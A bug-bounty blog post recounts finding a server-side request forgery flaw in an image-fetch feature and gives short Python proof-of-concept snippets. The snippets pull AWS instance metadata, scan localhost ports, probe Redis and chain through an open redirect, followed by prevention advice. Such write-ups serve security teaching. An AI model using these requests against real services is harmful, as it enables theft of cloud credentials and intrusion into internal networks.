π₯ How I Exploited an SSRF Vulnerability & Earned $5000 β Real-World Exploit! π₯
Introduction
Server-Side Request Forgery (SSRF) is a critical vulnerability that allows attackers to manipulate server-side requests, often leading to data leaks, internal network access, or even remote code execution. In this article, Iβll share how I discovered an SSRF vulnerability, exploited it, and earned a bug bounty reward. Plus, Iβll demonstrate a real-world exploit with code!
What is SSRF?
SSRF occurs when an attacker tricks the server into making requests to unintended destinations. These requests can be used to:
β
Access internal services (e.g., http://localhost:8080) β
Retrieve metadata from cloud services (e.g., AWS EC2 http://169.254.169.254/latest/meta-data/) β
Scan internal networks for open ports β
Exfiltrate sensitive data β
Exploit open redirect vulnerabilities
How I Found the SSRF Bug π
While testing a file upload and URL fetch feature, I noticed that the application allowed users to input external URLs to fetch images. This was a perfect candidate for SSRF exploitation.
Steps I Took:
- Tested fetching an external URL β The server successfully retrieved the image from my provided URL.
- Checked for internal network access β Attempted to fetch
http://localhost:80and received a response from the internal server. - Tested cloud metadata access β Requested
http://169.254.169.254/latest/meta-data/and successfully retrieved AWS instance details.
Real-World SSRF Exploit Example π¨
Hereβs a practical proof-of-concept (PoC) for the SSRF vulnerability:
import requests# Target URL that fetches images from external sources
url = "https://vulnerable-website.com/fetch?url="# Attempt to access AWS metadata service
payload = "http://169.254.169.254/latest/meta-data/"response = requests.get(url + payload)print("Response:", response.text)
How It Works:
- The vulnerable website accepts a user-supplied URL.
- Instead of providing a normal image URL, we send a request to AWS metadata.
- The server fetches the data and returns sensitive information, including IAM roles, instance ID, and credentials.
Advanced SSRF Exploitation Techniques π₯
1οΈβ£ Port Scanning the Internal Network
If the application allows custom ports, you can scan internal services:
for port in range(8000, 8100):
test_url = f"http://localhost:{port}/"
response = requests.get(url + test_url)
print(f"Port {port}: {response.status_code}")2οΈβ£ Accessing Redis, MySQL, or Other Internal Services
Some applications expose databases or internal services that can be accessed via SSRF.
payload = "http://127.0.0.1:6379/" # Targeting Redis
response = requests.get(url + payload)
print("Response:", response.text)3οΈβ£ Exploiting Open Redirects for Chaining Attacks
If the server follows redirects, we can chain SSRF with Open Redirects:
payload = "https://malicious-site.com/redirect?url=http://169.254.169.254/latest/meta-data/"
response = requests.get(url + payload)
print("Response:", response.text)How to Prevent SSRF π‘οΈ
To mitigate SSRF attacks, developers should:
β Restrict External Requests β Only allow whitelisted domains. β Disable Internal IP Access β Block requests to localhost (127.0.0.1), private IPs (10.x.x.x, 192.168.x.x, etc.). β Validate User Input β Use regular expressions to prevent unwanted URL schemes. β Use Metadata Proxy Services β Prevent direct access to cloud metadata endpoints. β Monitor and Log Requests β Detect unusual internal network access attempts.
The Bug Bounty Reward π°
After successfully exploiting and reporting the SSRF vulnerability via A Private Program, the company acknowledged the issue and rewarded me with $5000! π
This proves that SSRF vulnerabilities can have serious security implications and lead to big payouts for ethical hackers.
Conclusion
SSRF is a powerful attack vector that can be easily overlooked. If properly exploited, it can lead to internal network access, data leaks, and privilege escalation.
π Want to learn more about hacking & cybersecurity? Subscribe to my YouTube channel for exclusive tutorials!
πΊ YouTube: youtube.com/@theindiannetwork
π Read More on Medium: theindiannetwork.medium.com
π© Contact Me: theindiannetwork@protonmail.com
π¬ Have you ever exploited an SSRF vulnerability? Share your experience in the comments! π
